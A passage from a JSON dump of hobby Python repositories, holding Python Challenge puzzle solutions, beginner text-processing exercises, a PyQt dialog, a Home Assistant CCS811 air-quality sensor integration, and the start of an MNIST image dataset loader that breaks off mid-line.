"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\napp = QCoreApplication([])\nimg = QImage(\"wire.png\")\no = QImage(100, 100, img.format())\n\n# spiral wrap pixels into new 100x100 png\n#directional directives, 1, 0 means increment x by 1, and y by 0\ndirs = [(1, 0), (0, 1), (-1, 0), (0, -1)]\nx, y, z = -1, 0, 0\n\nfor i in range(200):\n d = dirs[i % 4] # gets one of the 4 directives in sequential order\n for j in range(100 - (i+1) // 2): # not sure about this syntax...\n x += d[0]\n y += d[1]\n pixel = img.pixel(z, 0)\n o.setPixel(x, y, pixel)\n z += 1\n\no.save(\"14.png\")\n# results in \"cat\" image. using this in url tells us name is uzi....next url is uzi"
},
{
"alpha_fraction": 0.6294357180595398,
"alphanum_fraction": 0.6337987184524536,
"avg_line_length": 41.623966217041016,
"blob_id": "c6c32797c52b87a7966aa122afa0d07a08b0a35b",
"content_id": "e65b05a45a09288aa6a62f2408e26cd88159c4ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10317,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 242,
"path": "/PythonExercises/simpleIO.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from pprint import pprint as pp\nimport re\nimport os\nimport time\nimport win32com.client\nimport functools\nimport random\nimport getpass\n\n# Write a version of a palindrome recogniser that accepts a file name from the user, reads each line,\n# and prints the line to the screen if it is a palindrome.\ndef print_palindromes(filePath):\n file = open(filePath)\n char_regex = re.compile(\"[a-z]\", re.IGNORECASE)\n for line in file:\n stripped = ''.join(char_regex.findall(line)).lower()\n if stripped == ''.join(reversed(stripped)):\n pp(line)\n\n\n# According to Wikipedia, a semordnilap is a word or phrase that spells a different word or phrase backwards.\n# (\"Semordnilap\" is itself \"palindromes\" spelled backwards.) Write a semordnilap recogniser that accepts a file name\n# (pointing to a list of words) from the user and finds and prints all pairs of words that are semordnilaps to the\n# screen. For example, if \"stressed\" and \"desserts\" is part of the word list, the the output should include the pair\n# \"stressed desserts\". Note, by the way, that each pair by itself forms a palindrome!\ndef find_semordnilaps(filePath):\n file = open(filePath)\n wordlist = []\n finallist = []\n for line in file:\n for word in line.split():\n wordlist.append(word)\n\n for x in wordlist:\n for y in wordlist:\n if x.lower() == ''.join(reversed(y)).lower():\n combined = x + ' ' + y\n inverted = y + ' ' + x\n if combined not in finallist and inverted not in finallist:\n finallist.append(combined)\n return finallist\n\n\n# Write a procedure char_freq_table() that, when run in a terminal, accepts a file name from the user,\n# builds a frequency listing of the characters contained in the file, and prints a sorted and nicely formatted\n# character frequency table to the screen.\ndef char_freq_table(file_path, sort_index):\n f = open(file_path)\n char_dict = {}\n for line in f:\n for c in line:\n if c not in char_dict.keys():\n char_dict[c] = 1\n else:\n char_dict[c] += 1\n\n finallist = []\n for x in char_dict.keys():\n finallist.append((x, char_dict[x]))\n\n return sorted(finallist, key=lambda x: x[sort_index])\n\n\n# The International Civil Aviation Organization (ICAO) alphabet assigns code words to the letters of the English\n# alphabet acrophonically (Alfa for A, Bravo for B, etc.) so that critical combinations of letters (and numbers)\n# can be pronounced and understood by those who transmit and receive voice messages by radio or telephone regardless\n# of their native language, especially when the safety of navigation or persons is essential. Here is a Python\n# dictionary covering one version of the ICAO alphabet:\n#\n# d = {'a':'alfa', 'b':'bravo', 'c':'charlie', 'd':'delta', 'e':'echo', 'f':'foxtrot',\n# 'g':'golf', 'h':'hotel', 'i':'india', 'j':'juliett', 'k':'kilo', 'l':'lima',\n# 'm':'mike', 'n':'november', 'o':'oscar', 'p':'papa', 'q':'quebec', 'r':'romeo',\n# 's':'sierra', 't':'tango', 'u':'uniform', 'v':'victor', 'w':'whiskey',\n# 'x':'x-ray', 'y':'yankee', 'z':'zulu'}\n#\n# Your task in this exercise is to write a procedure speak_ICAO() able to translate any text (i.e. any string) into\n# spoken ICAO words. You need to import at least two libraries: os and time. On a mac, you have access to the system\n# TTS (Text-To-Speech) as follows: os.system('say ' + msg), where msg is the string to be spoken. (Under UNIX/Linux\n# and Windows, something similar might exist.) Apart from the text to be spoken, your procedure also needs to accept\n# two additional parameters: a float indicating the length of the pause between each spoken ICAO word, and a float\n# indicating the length of the pause between each word spoken.\ndef speak_ICAO(text_to_speak, char_pause, word_pause):\n word_list = text_to_speak.split()\n d = {'a': 'alfa', 'b': 'bravo', 'c': 'charlie', 'd': 'delta', 'e': 'echo', 'f': 'foxtrot',\n 'g': 'golf', 'h': 'hotel', 'i': 'india', 'j': 'juliett', 'k': 'kilo', 'l': 'lima',\n 'm': 'mike', 'n': 'november', 'o': 'oscar', 'p': 'papa', 'q': 'quebec', 'r': 'romeo',\n 's': 'sierra', 't': 'tango', 'u': 'uniform', 'v': 'victor', 'w': 'whiskey',\n 'x': 'x-ray', 'y': 'yankee', 'z': 'zulu'}\n\n speaker = win32com.client.Dispatch(\"SAPI.SpVoice\")\n for word in word_list:\n for char in word:\n if char in d.keys():\n speaker.Speak(d[char])\n #os.system('say ' + d[char])\n time.sleep(char_pause)\n time.sleep(word_pause)\n\n\n# A hapax legomenon (often abbreviated to hapax) is a word which occurs only once in either the written record of a\n# language, the works of an author, or in a single text. Define a function that given the file name of a text will\n# return all its hapaxes. Make sure your program ignores capitalization.\ndef get_hapaxes(file_path):\n f = open(file_path)\n word_list = {}\n for line in f:\n for word in line.split():\n if word.lower() not in word_list.keys():\n word_list[word.lower()] = 1\n else:\n word_list[word.lower()] += 1\n final_list = []\n for x in word_list.keys():\n if word_list[x] == 1:\n final_list.append(x)\n return final_list\n\n\n# Write a program that given a text file will create a new text file in which all the lines from the original\n# file are numbered from 1 to n (where n is the number of lines in the file).\ndef number_lines(source_file, dest_file):\n ct = 0\n with open(source_file) as s:\n with open(dest_file, 'w+') as d:\n for line in s:\n d.write(str(ct) + '. ' + line)\n ct += 1\n return \"Wrote %s lines.\" % str(ct)\n\n\n# Write a program that will calculate the average word length of a text stored in a file (i.e the sum of all the\n# lengths of the word tokens in the text, divided by the number of word tokens).\ndef get_avg_word_len(file_path):\n lengths = []\n with open(file_path) as f:\n for line in f:\n for word in line.split():\n lengths.append(len(word))\n return functools.reduce(lambda x, y: x + y, lengths) / len(lengths)\n\n\n# Write a program able to play the \"Guess the number\"-game, where the number to be guessed is randomly chosen\n# between 1 and 20. (Source: http://inventwithpython.com) This is how it should work when run in a terminal:\n#\n# >>> import guess_number\n# Hello! What is your name?\n# Torbjörn\n# Well, Torbjörn, I am thinking of a number between 1 and 20.\n# Take a guess.\n# 10\n# Your guess is too low.\n# Take a guess.\n# 15\n# Your guess is too low.\n# Take a guess.\n# 18\n# Good job, Torbjörn! You guessed my number in 3 guesses!\ndef guess_number_game():\n user_name = input(\"Hello! What is your name?\\n\")\n num_to_guess = random.randrange(1, 20)\n guess_count = 0\n guess_value = 0\n pp(\"Well %s, I am thinking of a number between 1 and 20.\" % user_name)\n while guess_value != num_to_guess:\n guess_count += 1\n guess_value = int(input(\"Take a guess.\\n\"))\n if guess_value == num_to_guess:\n pp(\"Good job, %s! You guessed my number in %d guesses!\" % (user_name, guess_count))\n return\n elif guess_value < num_to_guess:\n pp(\"Your guess is too low.\")\n elif guess_value > num_to_guess:\n pp(\"Your guess is too high.\")\n\n\n# An anagram is a type of word play, the result of rearranging the letters of a word or phrase to produce a new\n# word or phrase, using all the original letters exactly once; e.g., orchestra = carthorse, A decimal point =\n# I'm a dot in place. Write a Python program that, when started\n# 1) randomly picks a word w from given list of words,\n# 2) randomly permutes w (thus creating an anagram of w),\n# 3) presents the anagram to the user, and\n# 4) enters an interactive loop in which the user is invited to guess the original word.\n# It may be a good idea to work with (say) colour words only. The interaction with the program may look like so:\n#\n# >>> import anagram\n# Colour word anagram: onwbr\n# Guess the colour word!\n# black\n# Guess the colour word!\n# brown\n# Correct!\ndef guess_word_game():\n word_list = ['red', 'green', 'brown', 'black', 'purple']\n target_word = word_list[random.randrange(0, len(word_list))]\n anagram = ''\n idxlist = []\n while len(idxlist) < len(target_word):\n rnd = random.randrange(0, len(target_word))\n if rnd not in idxlist:\n idxlist.append(rnd)\n for x in idxlist:\n anagram += target_word[x]\n pp(\"Color word anagram: %s\" % anagram)\n guess_word = \"\"\n while guess_word != target_word:\n guess_word = input(\"Guess the colour word!\\n\")\n pp(\"Correct!\")\n\n\n# In a game of Lingo, there is a hidden word, five characters long. The object of the game is to find this word by\n# guessing, and in return receive two kinds of clues: 1) the characters that are fully correct, with respect to\n# identity as well as to position, and 2) the characters that are indeed present in the word, but which are placed\n# in the wrong position. Write a program with which one can play Lingo. Use square brackets to mark characters correct\n# in the sense of 1), and ordinary parentheses to mark characters correct in the sense of 2). Assuming, for example,\n# that the program conceals the word \"tiger\", you should be able to interact with it in the following way:\n#\n# >>> import lingo\n# snake\n# Clue: snak(e)\n# fiest\n# Clue: f[i](e)s(t)\n# times\n# Clue: [t][i]m[e]s\n# tiger\n# Clue: [t][i][g][e][r]\ndef lingo():\n input_word = getpass.getpass(prompt=\"Enter word to guess:\\n\")\n guess_word = \"\"\n while input_word != guess_word:\n response = \"\"\n guess_word = input(\"Enter your guess:\\n\")\n if input_word == guess_word:\n pp(\"Good job! The word was indeed %s\" % input_word)\n return\n for x in range(0, len(guess_word)):\n char = guess_word[x]\n if x < len(input_word) and input_word[x] == char:\n char = \"[\" + char + \"]\"\n elif x < len(input_word) and char in input_word:\n char = \"(\" + char + \")\"\n response += char\n pp(\"Clue: %s\" % response)"
},
{
"alpha_fraction": 0.6038338541984558,
"alphanum_fraction": 0.6230031847953796,
"avg_line_length": 27.5,
"blob_id": "22a05f0b9cc9a700e967dbef9e60d6d292a63507",
"content_id": "0abb86fac35ffbe9909dd6b3419e848ca6a66a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 22,
"path": "/PythonChallenges/4.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport urllib.request as req\n\nrootUrl = \"http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing=\"\nnothing = \"82682\"\nisEnd = False\nhttp = req.urlopen(rootUrl + nothing).read().decode(\"utf-8\")\n\nwhile not isEnd:\n print(http)\n if http.__contains__('and the next nothing is'):\n nothing = http[http.index('and the next nothing is ')+24:]\n elif http.__contains__('Yes. Divide by two and keep going.'):\n value = int(nothing)\n value /= 2\n nothing = str(value)\n else:\n isEnd = True\n break\n\n http = req.urlopen(rootUrl + nothing).read().decode(\"utf-8\")"
},
{
"alpha_fraction": 0.6191709637641907,
"alphanum_fraction": 0.6347150206565857,
"avg_line_length": 17.428571701049805,
"blob_id": "6d48459affcfebc3d96da8195b2c6216ec74871b",
"content_id": "f2af4e89b02e628b72c2c9ede810f459938a2ca9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/PythonChallenges/3.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# use provided data to find characters?\nimport string\nimport re\n\npattern = \"[a-z]([A-Z]{3}[a-z]{1}[A-Z]{3})[a-z]\"\n\nrawDataFile = open(\"matchPattern.txt\", \"r\")\nrawData = \"\"\nmatches = []\n\nfor line in rawDataFile:\n match = re.findall(pattern, line)\n if match:\n matches += match\n\nfor match in matches:\n rawData += match[3]\n\nprint(matches)\nprint(rawData)"
},
{
"alpha_fraction": 0.6389891505241394,
"alphanum_fraction": 0.6462093591690063,
"avg_line_length": 20.384614944458008,
"blob_id": "0579a8a66a3a8a914691d2bbc18d466eb3bf9e83",
"content_id": "e28b91441aac0162a27d2b74dc5a2c2c3cd57eef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/PythonChallenges/2.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# use provided data to find characters?\nimport string\n\nrawDataFile = open(\"rareChars.txt\", \"r\")\nrawData = \"\"\n\nfor line in rawDataFile:\n for char in line:\n if (string.ascii_lowercase.__contains__(char)):\n rawData += char\n\nprint(rawData)"
},
{
"alpha_fraction": 0.6592977643013,
"alphanum_fraction": 0.6644993424415588,
"avg_line_length": 29.799999237060547,
"blob_id": "ba104835bc20d4f127e8d2b3e9b8d5ca35ca978b",
"content_id": "b1694dc6eb0425de28cfe3da8bcb88372fb14cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 25,
"path": "/PythonChallenges/1.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n#convert garbled text to real text\n#hint: k --> m\n# o --> q\n# e --> g\n\ngarbledText = \"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\"\ncleanText = \"\"\n\n#having completed the challenge, use this to move to the next page\ngarbledText = \"map\"\n\nfor char in garbledText:\n if string.ascii_lowercase.__contains__(char):\n idx = string.ascii_lowercase.index(char) + 2\n if idx > len(string.ascii_lowercase) - 1:\n idx -= len(string.ascii_lowercase)\n\n cleanText += string.ascii_lowercase[idx]\n else:\n cleanText += char\n\nprint(cleanText)"
},
{
"alpha_fraction": 0.6706036925315857,
"alphanum_fraction": 0.7034120559692383,
"avg_line_length": 35.261905670166016,
"blob_id": "ee3cda1c0f0c9ff3d2e7614982d5d134d4557db6",
"content_id": "9a2ae61086314ea5a832664c9db6e703f37f9ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 42,
"path": "/pluralsight/myDiag.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'myDiag.ui'\n#\n# Created: Mon Sep 8 08:52:09 2014\n# by: PyQt4 UI code generator 4.11.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\nclass Ui_dSomeWindow(object):\n def setupUi(self, dSomeWindow):\n dSomeWindow.setObjectName(_fromUtf8(\"dSomeWindow\"))\n dSomeWindow.resize(281, 252)\n self.pushButton = QtGui.QPushButton(dSomeWindow)\n self.pushButton.setGeometry(QtCore.QRect(90, 210, 93, 28))\n self.pushButton.setObjectName(_fromUtf8(\"pushButton\"))\n self.listView = QtGui.QListView(dSomeWindow)\n self.listView.setGeometry(QtCore.QRect(10, 10, 261, 192))\n self.listView.setObjectName(_fromUtf8(\"listView\"))\n\n self.retranslateUi(dSomeWindow)\n QtCore.QMetaObject.connectSlotsByName(dSomeWindow)\n\n def retranslateUi(self, dSomeWindow):\n dSomeWindow.setWindowTitle(_translate(\"dSomeWindow\", \"This is my Dialog\", None))\n self.pushButton.setText(_translate(\"dSomeWindow\", \"PushButton\", None))\n\n"
},
{
"alpha_fraction": 0.637410044670105,
"alphanum_fraction": 0.6489208340644836,
"avg_line_length": 28,
"blob_id": "2b6fac1f7ed124763d340ad45fa0969293643d96",
"content_id": "1b4f9d4426302f7845ac51a9e0a9d4f2bbd0736e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/PythonChallenges/6.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport zipfile\n\nzf = zipfile.ZipFile('channel.zip')\n\ntargetFileName = \"readme.txt\"\nisEnd = False\nmasterComment = \"\"\n\nwhile not isEnd:\n content = zf.read(targetFileName).decode(\"utf-8\")\n masterComment += zf.getinfo(targetFileName).comment.decode('utf-8')\n if content.__contains__(\"start from\"):\n startIdx = content.index(\"start from\") + 11\n endIdx = content.index(\"\\n\", startIdx)\n targetFileName = content[startIdx:endIdx] + \".txt\"\n elif content.__contains__(\"Next nothing is\"):\n startIdx = content.index(\"Next nothing is\") + 16\n targetFileName = content[startIdx:] + \".txt\"\n else:\n isEnd = True\n\nprint(masterComment)"
},
{
"alpha_fraction": 0.521335780620575,
"alphanum_fraction": 0.5621521472930908,
"avg_line_length": 24.714284896850586,
"blob_id": "16234e914f4e0abff0de1ce6ee99cfe586bb2a51",
"content_id": "245789c0ab6bdd900dd7a72c840e9aaba7e9412b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 21,
"path": "/PythonChallenges/12.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/evil1.jpg\napp = QCoreApplication([])\n\nstuff = \"\"\nbytes = b\"\"\nwith open(\"evil2.gfx\", \"rb\") as f:\n\n byte = f.read(1)\n while byte != b\"\":\n bytes += byte\n byte = f.read(1)\n\nfiles = [('jpg', bytes[0::5]), ('png', bytes[1::5]), ('gif', bytes[2::5]), ('png', bytes[3::5]), ('jpg', bytes[4::5])]\n\nfor i in range(5):\n open('evil2-%d.%s' % (i, files[i][0]), 'wb').write(files[i][1])"
}
] | 34 |
josla972/ccs811
|
https://github.com/josla972/ccs811
|
82b1be6898b63348f41a67fd01786cf0caf96de6
|
2d7427c0742dec84fab5911220594fc08679ed54
|
076a966520888dae601ece307bc686b0c8f3eb83
|
refs/heads/master
| 2020-12-14T10:17:10.872867 | 2020-01-29T01:23:58 | 2020-01-29T01:23:58 | 234,708,367 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 27,
"blob_id": "e55df827a5e562d175c60a2dc350015d8418c702",
"content_id": "7d58a76aa291c56fc8c7b54564f3d75375a1c654",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/__init__.py",
"repo_name": "josla972/ccs811",
"src_encoding": "UTF-8",
"text": "\"\"\"The ccs811 component.\"\"\"\n"
},
{
"alpha_fraction": 0.6409250497817993,
"alphanum_fraction": 0.6559372544288635,
"avg_line_length": 33.22685241699219,
"blob_id": "4942be47a416554d31fb30cfe5886c5dcb525561",
"content_id": "3caf721a6921b8ae74c1b25cb6bb95f29b279cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7394,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 216,
"path": "/sensor.py",
"repo_name": "josla972/ccs811",
"src_encoding": "UTF-8",
"text": "\"\"\"Support for CCS811 temperature and humidity sensor.\"\"\"\nfrom datetime import timedelta\nfrom functools import partial\nimport asyncio\nimport logging\nimport sys\nimport os\nimport time\nimport time\nimport busio\n\nimport adafruit_ccs811 # pylint: disable=import-error\n\nimport voluptuous as vol\n\nfrom homeassistant.core import DOMAIN as HA_DOMAIN, callback\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import CONF_NAME, CONF_MONITORED_CONDITIONS, EVENT_HOMEASSISTANT_START, STATE_UNKNOWN\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.util import Throttle\nfrom homeassistant.helpers.event import (\n async_track_state_change,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nCONF_I2C_ADDRESS = \"i2c_address\"\nCONF_I2C_SCL = \"i2c_scl\"\nCONF_I2C_SDA = \"i2c_sda\"\n\nDEFAULT_NAME = \"CCS811 Sensor\"\nDEFAULT_I2C_ADDRESS = 0x5A\nDEFAULT_I2C_SCL = 3\nDEFAULT_I2C_SDA = 2\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(seconds=3)\n\nCONF_HUMIDITY_SENSOR = 'humidity_sensor'\nCONF_TEMPERATURE_SENSOR = 'temperature_sensor'\n\nSENSOR_ECO2 = \"eco2\"\nSENSOR_TVOC = \"tvoc\"\nSENSOR_TYPES = {\n SENSOR_ECO2: [\"eCO2\", \"ppm\"],\n SENSOR_TVOC: [\"tVOC\", \"ppb\"],\n}\nDEFAULT_MONITORED = [SENSOR_ECO2, SENSOR_TVOC]\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_HUMIDITY_SENSOR, default=None): vol.Coerce(cv.entity_id),\n vol.Optional(CONF_TEMPERATURE_SENSOR, default=None): vol.Coerce(cv.entity_id),\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),\n vol.Optional(CONF_MONITORED_CONDITIONS, default=DEFAULT_MONITORED): vol.All(\n cv.ensure_list, [vol.In(SENSOR_TYPES)]\n ),\n vol.Optional(CONF_I2C_SCL, default=DEFAULT_I2C_SCL): vol.Coerce(int),\n vol.Optional(CONF_I2C_SDA, default=DEFAULT_I2C_SDA): vol.Coerce(int)\n }\n)\n\n\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info=None):\n name = config.get(CONF_NAME)\n i2c_address = config.get(CONF_I2C_ADDRESS)\n i2c_bus = busio.I2C(config.get(CONF_I2C_SCL), config.get(CONF_I2C_SDA))\n temperature_sensor_entity_id = config.get(CONF_TEMPERATURE_SENSOR)\n humidity_sensor_entity_id = config.get(CONF_HUMIDITY_SENSOR)\n\n sensor = await hass.async_add_job(\n partial(\n adafruit_ccs811.CCS811,\n i2c_bus=i2c_bus,\n address=i2c_address,\n )\n )\n\n sensor_handler = await hass.async_add_job(CCS811Handler, sensor)\n\n dev = []\n try:\n for variable in config[CONF_MONITORED_CONDITIONS]:\n dev.append(\n CCS811Sensor(sensor_handler, variable, name, temperature_sensor_entity_id, humidity_sensor_entity_id)\n )\n except KeyError:\n pass\n\n async_add_entities(dev, True)\n\n\nclass CCS811Handler:\n \"\"\"CCS811 sensor working in i2C bus.\"\"\"\n\n def __init__(self, sensor):\n \"\"\"Initialize the sensor handler.\"\"\"\n self.sensor = sensor\n self.temperature = None\n self.humitidy = None\n self.update()\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self):\n \"\"\"Update temperature and humidity compensation and read sensor data.\"\"\"\n if self.temperature != None and self.humidity != None:\n self.sensor.set_environmental_data(self.humidity, self.temperature)\n# Trim away error values.\n new_eco2 = self.sensor.eco2\n if new_eco2 < 65535:\n self.eco2 = new_eco2\n self.tvoc = self.sensor.tvoc\n\n def set_temperature(self, temperature):\n \"\"\"Set new target temperature.\"\"\"\n self.temperature = temperature\n\n def set_humidity(self, humidity):\n \"\"\"Set new target humidity.\"\"\"\n self.humidity = humidity\n\nclass CCS811Sensor(Entity):\n \"\"\"Implementation of the CCS811 sensor.\"\"\"\n\n def __init__(self, ccs811_client, sensor_type, name, temperature_sensor_entity_id, humidity_sensor_entity_id):\n \"\"\"Initialize the sensor.\"\"\"\n self.client_name = name\n self.temperature_sensor_entity_id = temperature_sensor_entity_id\n self.humidity_sensor_entity_id = humidity_sensor_entity_id\n self._name = SENSOR_TYPES[sensor_type][0]\n self.ccs811_client = ccs811_client\n self.type = sensor_type\n self._state = None\n self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]\n \n async def async_added_to_hass(self):\n \"\"\"Run when entity about to be added.\"\"\"\n await super().async_added_to_hass()\n\n # Add listener\n async_track_state_change(\n self.hass, self.temperature_sensor_entity_id, self._async_temperature_sensor_changed\n )\n async_track_state_change(\n self.hass, self.humidity_sensor_entity_id, self._async_humidity_sensor_changed\n )\n\n @callback\n def _async_startup(event):\n \"\"\"Init on startup.\"\"\"\n sensor_state_temperature = self.hass.states.get(self.temperature_sensor_entity_id)\n if sensor_state_temperature and sensor_state_temperature.state != STATE_UNKNOWN:\n self._async_update_temperature(sensor_state_temperature)\n\n sensor_state_humidity = self.hass.states.get(self.humidity_sensor_entity_id)\n if sensor_state_humidity and sensor_state_humidity.state != STATE_UNKNOWN:\n self._async_update_humidity(sensor_state_humidity)\n\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, _async_startup)\n\n\n async def _async_temperature_sensor_changed(self, entity_id, old_state, new_state):\n \"\"\"Handle temperature changes.\"\"\"\n if new_state is None:\n return\n\n self._async_update_temperature(new_state)\n\n @callback\n def _async_update_temperature(self, state):\n \"\"\"Update thermostat with latest state from sensor.\"\"\"\n try:\n self.ccs811_client.set_temperature(float(state.state))\n except ValueError as ex:\n _LOGGER.error(\"Unable to update from sensor: %s\", ex)\n\n async def _async_humidity_sensor_changed(self, entity_id, old_state, new_state):\n \"\"\"Handle humidity changes.\"\"\"\n if new_state is None:\n return\n\n self._async_update_humidity(new_state)\n\n @callback\n def _async_update_humidity(self, state):\n \"\"\"Update thermostat with latest state from sensor.\"\"\"\n try:\n self.ccs811_client.set_humidity(float(state.state))\n except ValueError as ex:\n _LOGGER.error(\"Unable to update from sensor: %s\", ex)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return f\"{self.client_name} {self._name}\"\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return self._state\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement of the sensor.\"\"\"\n return self._unit_of_measurement\n\n async def async_update(self):\n \"\"\"Get the latest data from the CCS811 and update the states.\"\"\"\n await self.hass.async_add_job(self.ccs811_client.update)\n if self.type == SENSOR_ECO2:\n eco2 = self.ccs811_client.eco2\n self._state = eco2\n elif self.type == SENSOR_TVOC:\n self._state = self.ccs811_client.tvoc\n\n"
}
] | 2 |
radiodee1/awesome-nnet
|
https://github.com/radiodee1/awesome-nnet
|
5f16e11d8e1cf4d846f111c508aca5e4befc46f6
|
b492df969ce9dff38e25f31bc9731b03b9e2b611
|
b0f97571ec2aa30cc059b53b8e7fb7c80128da3d
|
refs/heads/master
| 2021-05-29T12:37:53.130220 | 2015-08-23T19:53:29 | 2015-08-23T19:53:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4853312075138092,
"alphanum_fraction": 0.5073012113571167,
"avg_line_length": 33.780601501464844,
"blob_id": "fd26c3baea32821e2395d6d83c03dffcf108d0ec",
"content_id": "c2a9a7e0c2be39afd22b127be16685f17bf2bfe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15066,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 433,
"path": "/load_png_mnist.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "import numpy\n#import pylab\nfrom PIL import Image\nimport cPickle\nimport gzip\nimport os\nimport sys\nimport time\nimport random\n\nimport theano\nimport theano.tensor as T\n\nimport math\nfrom glob import glob\nfrom os.path import join\nfrom os.path import expanduser\nimport getpass\n#import pickle_local as plocal\n#import mnist_loader as mnistl\n#from enum_local import LOAD\n\ndef get_dataset(alphabet_set = False, \n test_only = False, \n img_pickle_ld = True, \n img_pickle_sv = True, \n nist_stretch = 2,\n large_size = -1 ,\n save_filename = \"\",\n randomize = False) :\n \n epochs = 10\n if (save_filename != \"\") :\n nist_stretch, large_size, epochs, save_filename , load , load_type = parse_filename(save_filename)\n if load :\n img_pickle_ld = True\n else :\n img_pickle_sv = False\n \n nist_num = nist_stretch * 1024 * 5 ## TOTAL IMG SPACE REQUESTED (images)\n if (large_size == -1) :\n large_size = 1024 * 10 * (28 * 28) ## LIMIT SIZE (not images)\n else:\n size = 28, 28\n img2 = numpy.zeros(shape=(size), dtype='float32')\n s = sys.getsizeof(img2)\n print(str(s) + \" size of 28x28\")\n if (large_size > s) : large_size = large_size / (s) ## (convert to num of images.)\n else : print (\"small 'BigBatch' size, using as num of images.\")\n rval_array = []\n pickle_len = 0\n obj = [[],0]\n dset = [[obj,obj,obj]]\n print(\"images requested: \" + str(nist_num))\n\n t1 = []\n l1 = []\n t2 = []\n l2 = []\n t3 = []\n l3 = []\n\n if img_pickle_ld and (not img_pickle_sv) and load_type != LOAD.NUMERIC :\n dset = plocal.load_pickle_img(save_filename);\n #for j in dset :\n pickle_len = len(dset[0][0][0] )\n \n pickle_len = int(pickle_len )\n print(pickle_len, nist_num)\n if pickle_len < nist_num : nist_num = pickle_len\n \n if nist_num > large_size:\n print(\"Automatically splitting input files.\")\n m = int(math.ceil(nist_num / float(large_size)))\n else:\n m = 1\n if (not img_pickle_sv) :\n \n for zz in range(m):\n print('get dataset. ' + str(zz+1) + ' of ' + str(m))\n \n if (not alphabet_set) or load_type == LOAD.NUMERIC :\n t1,l1, files = batch_load(\"normpic\" , 1, 60000, randomize=randomize); ## 60000\n t2,l2, files = batch_load(\"normvalid\", 1, 5000, randomize = 